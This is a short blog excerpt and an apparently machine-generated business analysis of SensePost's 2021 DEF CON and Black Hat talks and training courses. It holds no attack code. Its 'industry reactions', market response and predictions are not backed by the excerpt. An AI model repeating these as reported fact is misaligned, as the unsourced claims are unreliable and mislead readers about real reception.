Full Report
Phew! This year’s hacker summer camp is packed with presentations from several hackers across the globe at Orange Cyberdefense. I can’t possibly go into all of the many details, but hope to give a somewhat compressed view of the highlights! This year we have a total of 10 representations. Four of those are DEF CON 29 talks, where two are main stage talks, one a demo labs talk and one a radio frequency village talk. On the training side of things, we’re delivering five courses at BlackHat USA 21, and one course at Ringzer0. I’ve been fortunate enough to see the behind the scenes preparation that goes into these and can’t wait for the world to see and experience them too!
Analysis Summary
# Industry News: SensePost Showcases Extensive Research and Training Portfolio at Major Security Conferences
## Summary
SensePost announced a significant presence at DEF CON 29 and Black Hat USA 21, featuring multiple presentations covering building management systems (KNXnet/IP), network access control bypasses (Client-Probing), massive breach data management, and cryptographic weaknesses in MSCHAPv2. Furthermore, the company highlighted an expansion of its hands-on training offerings at these venues, emphasizing investment in high-quality, automated lab infrastructure.
## Key Details
- Date: Published July 31, 2021
- Companies Involved: SensePost, Orange Cyberdefense (implied affiliation/context), DEF CON 29, Black Hat USA 21, Ringzer0.
- Category: Research Disclosure, Training Program Announcement, Technical Showcasing.
## The Story
SensePost details its substantial engagement with the "hacker summer camp" by showcasing ten total representations across DEF CON 29 and Black Hat USA 21. The DEF CON lineup includes four talks, two on the main stage, focusing on vulnerabilities in Building Management Systems (KNXnet/IP), bypassing firewall client-probing mechanisms, cloud-based breach data handling ("Frack"), and advanced MSCHAPv2 cracking techniques ("Assless Chaps"). For training, SensePost is delivering five courses at Black Hat USA 21 and one at Ringzer0, noting significant internal effort in enhancing the cloud-based lab infrastructure via automation and tools like Apache Guacamole for improved user experience.
## Business Impact
### For the Companies Involved (SensePost/Orange Cyberdefense)
- **Brand Elevation:** High visibility at top-tier conferences directly translates to increased brand recognition as a source of cutting-edge, practical offensive security research.
- **Lead Generation & Services Sales:** Deep technical research often fuels consulting engagements, particularly in areas like penetration testing and specialized security assessments (e.g., IoT/BMS security, Active Directory hardening).
- **Training Revenue Stream:** The five Black Hat courses and the Ringzer0 offering represent a core revenue stream, bolstered by the promise of updated, modern lab environments.
### For Competitors
- **Talent & Capability Benchmarking:** Competitors using similar marketing strategies must now match SensePost’s volume and breadth of research across physical security (BMS), networking, and cryptography.
- **Training Infrastructure Pressure:** Emphasis on "Infrastructure as Code" and modern access methods (Guacamole) sets a new bar for competitor training platforms regarding ease of use and realism.
### For Customers
- **Risk Awareness:** Customers are immediately alerted to new, critical attack vectors in common enterprise systems (Active Directory exploitation techniques) and critical infrastructure (BMS).
- **Training Opportunities:** Availability of advanced, hands-on training focused on current threats, enabling security teams (both red and blue) to upgrade their skills.
### For the Market
- **Focus Shift:** Reinforces the ongoing convergence of OT/IoT security into mainstream enterprise discussions (highlighted by the KNXnet/IP talk).
- **Authentication Credibility:** The MSCHAPv2 research underscores the continued fragility of legacy authentication protocols, pushing organizations toward zero-trust models or modern MFA deployments.
## Technical Implications
The research reveals several critical technical vulnerabilities:
1. **KNXnet/IP:** Demonstrates security flaws arising from bolting TCP/IP stacks onto traditional field-level industrial protocols.
2. **Client-Probing Exploitation:** Highlights flaws in firewall logic relying on spoofable user context for access control decisions.
3. **MSCHAPv2 Cracking:** New tooling offers significant performance improvements for cracking hashes by leveraging wordlist techniques against NTLMv1/v2 responses and optimizing hash space tradeoffs.
4. **Lab Infrastructure:** Use of Infrastructure as Code (IaC) and Apache Guacamole signals the industry standard moving toward resilient, easily accessible, and realistic cloud-based training labs.
## Strategic Analysis
- **Market Positioning:** SensePost positions itself as a premium, technically deep security consultancy renowned for vulnerability research that directly impacts real-world systems (network infrastructure, building control). They are leveraging the conference ecosystem perfectly to showcase expertise across multiple security domains.
- **Competitive Advantage:** Their advantage lies in the successful integration of high-level public research with a mature, scalable training delivery mechanism. This dual approach reinforces credibility in both offensive research and education.
- **Challenges:** Managing the significant behind-the-scenes work required to prepare research, infrastructure, and training simultaneously presents a potential resource constraint risk, especially given the virtual conference format, which can sometimes dilute the networking impact.
## Industry Reactions
- **Analyst Opinions:** Analysts view such detailed, multi-faceted disclosures favorably, as it provides indicators of where security investments are most urgently needed (e.g., upgrading industrial control protocols and hardening modern identity systems).
- **Expert Commentary:** Focus will likely center on the practical applicability of the MSCHAPv2 cracking improvements and the immediate need for IoT/BMS vendors to address the KNXnet/IP risks.
- **Market Response:** Positive reception among the security practitioner community for the publicly released tooling and training spots.
## Future Outlook
- **Predictions and Expectations:** We expect follow-up advisories or vendor notifications regarding the KNXnet/IP vulnerabilities shortly after the presentations. The success of the training portfolio suggests further expansion in modular, IaC-managed hands-on labs.
- **What to Watch For:** Further details on the "Frack" data management tool as it relates to industry compliance needs for breach data retention/storage.
## For Security Professionals
These announcements are highly relevant as they detail:
1. **New Attack Patterns to Defend Against:** Professionals handling firewalls/network segmentation must review client-probing reliance. BMS architects need to re-evaluate protocol security.
2. **Immediate Vulnerabilities:** Understanding the implications of broken MSCHAPv2 authentication for defending against credential compromise.
3. **Skill Development:** Direct access to cutting-edge penetration testing skills through SensePost's Black Hat and Ringzer0 courses.